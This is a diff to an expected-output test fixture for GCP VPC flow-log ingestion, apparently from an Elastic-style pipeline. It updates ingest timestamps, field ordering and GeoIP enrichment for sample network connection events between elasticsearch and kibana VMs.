@@ -15886,7 +16650,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392053400Z", + "ingested": "2021-12-14T14:43:27.415256927Z", "original": "{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", 
@@ -15897,9 +16661,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.291Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.139.99.242" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 209 + } + } + }, "destination": { "address": "10.139.99.242", "port": 9200, @@ -15908,13 +16702,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65274, 
@@ -15922,6 +16719,16 @@ "ip": "67.43.156.13", "packets": 745 }, + "event": { + "ingested": "2021-12-14T14:43:27.415257364Z", + "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:01.270996793Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "198begsfh44xy4", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -15933,7 +16740,9 @@ "iana_number": "6", "packets": 745, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" @@ -15944,6 +16753,9 @@ "10.139.99.242" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -15960,25 +16772,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 209 + "ms": 176 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392057800Z", - "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:01.270996793Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "198begsfh44xy4", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.139.99.242", "port": 9200, 
@@ -15987,13 +16784,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 53879, @@ -16001,6 +16801,16 @@ "ip": "67.43.156.13", "packets": 726 }, + "event": { + "ingested": "2021-12-14T14:43:27.415258130Z", + "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.760414869Z", + "end": "2019-06-14T03:49:56.312105537Z", + "id": "198begsfh44xy1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -16012,7 +16822,9 @@
 "iana_number": "6",
 "packets": 726,
 "direction": "inbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:17.291Z",
 "ecs": {
 "version": "1.12.0"
@@ -16020,9 +16832,12 @@
 "related": {
 "ip": [
 "67.43.156.13",
- "10.139.99.242"
+ "10.87.40.76"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
 "destination": {
 "vpc": {
@@ -16039,25 +16854,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 176 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392062300Z", - "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:00.760414869Z", - "end": "2019-06-14T03:49:56.312105537Z", - "id": "198begsfh44xy1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -16066,11 +16866,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34450, 
@@ -16078,6 +16883,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415258591Z", + "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:38.189569840Z", + "end": "2019-06-14T03:47:38.299054333Z", + "id": "198begsfh44xxp", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16089,19 +16904,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 209 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -16112,38 +16938,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392066700Z", - "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:38.189569840Z", - "end": "2019-06-14T03:47:38.299054333Z", - "id": "198begsfh44xxp", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 33652 + "number": 35908 }, "address": "67.43.156.13", "port": 65274, 
@@ -16157,6 +16965,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415259054Z", + "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:01.270996793Z", + "end": "2019-06-14T03:49:56.220838853Z", + "id": "198begsfh44xxv", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -16168,25 +16986,24 @@
 "iana_number": "6",
 "packets": 610,
 "direction": "outbound"
- },
+ }
+ },
+ {
 "@timestamp": "2019-06-14T03:50:17.291Z",
 "ecs": {
 "version": "1.12.0"
 },
 "related": {
 "ip": [
- "10.139.99.242",
- "67.43.156.13"
+ "67.43.156.13",
+ "10.87.40.76"
 ]
 },
+ "log": {
+ "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
+ },
 "gcp": {
- "vpcflow": {
- "reporter": "SRC",
- "rtt": {
- "ms": 209
- }
- },
- "source": {
+ "destination": {
 "vpc": {
 "project_id": "my-sample-project",
 "subnetwork_name": "default",
@@ -16197,23 +17014,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392071500Z", - "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:01.270996793Z", - "end": "2019-06-14T03:49:56.220838853Z", - "id": "198begsfh44xxv", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -16222,11 +17030,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" - }, + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60968, @@ -16234,6 +17047,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415259521Z", + "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:39.653136947Z", + "end": "2019-06-14T03:43:39.777977145Z", + "id": "198begsfh44xy7", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -16245,46 +17068,6 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, - "@timestamp": "2019-06-14T03:50:17.291Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "67.43.156.13", - "10.87.40.76" - ] - }, - "gcp": { - "destination": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.392077100Z", - "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:39.653136947Z", - "end": "2019-06-14T03:43:39.777977145Z", - "id": "198begsfh44xy7", - "category": "network", - "type": "connection" } }, { 
@@ -16293,11 +17076,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33530, @@ -16375,7 +17163,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392082700Z", + "ingested": "2021-12-14T14:43:27.415259989Z", "original": "{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", 
@@ -16386,18 +17174,51 @@
 }
 },
 {
+ "@timestamp": "2019-06-14T03:50:17.291Z",
+ "ecs": {
+ "version": "1.12.0"
+ },
+ "related": {
+ "ip": [
+ "10.139.99.242",
+ "67.43.156.13"
+ ]
+ },
 "log": {
 "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows"
 },
+ "gcp": {
+ "vpcflow": {
+ "reporter": "SRC",
+ "rtt": {
+ "ms": 82
+ }
+ },
+ "source": {
+ "vpc": {
+ "project_id": "my-sample-project",
+ "subnetwork_name": "default",
+ "vpc_name": "default"
+ },
+ "instance": {
+ "region": "us-east1",
+ "project_id": "my-sample-project",
+ "zone": "us-east1-b"
+ }
+ }
+ },
 "destination": {
 "geo": {
- "continent_name": "America",
- "country_name": "usa",
- "city_name": "Broomfield",
- "region_name": "Colorado"
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
 },
 "as": {
- "number": 33652
+ "number": 35908
 },
 "address": "67.43.156.13",
 "port": 65275,
@@ -16411,6 +17232,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415260422Z", + "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:00.565734921Z", + "end": "2019-06-14T03:49:56.316847800Z", + "id": "198begsfh44xxq", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -16422,22 +17253,27 @@ "iana_number": "6", "packets": 588, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.291Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", + "10.87.40.76", "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 82 + "ms": 36 } }, "source": { 
@@ -16453,28 +17289,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392088300Z", - "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-projec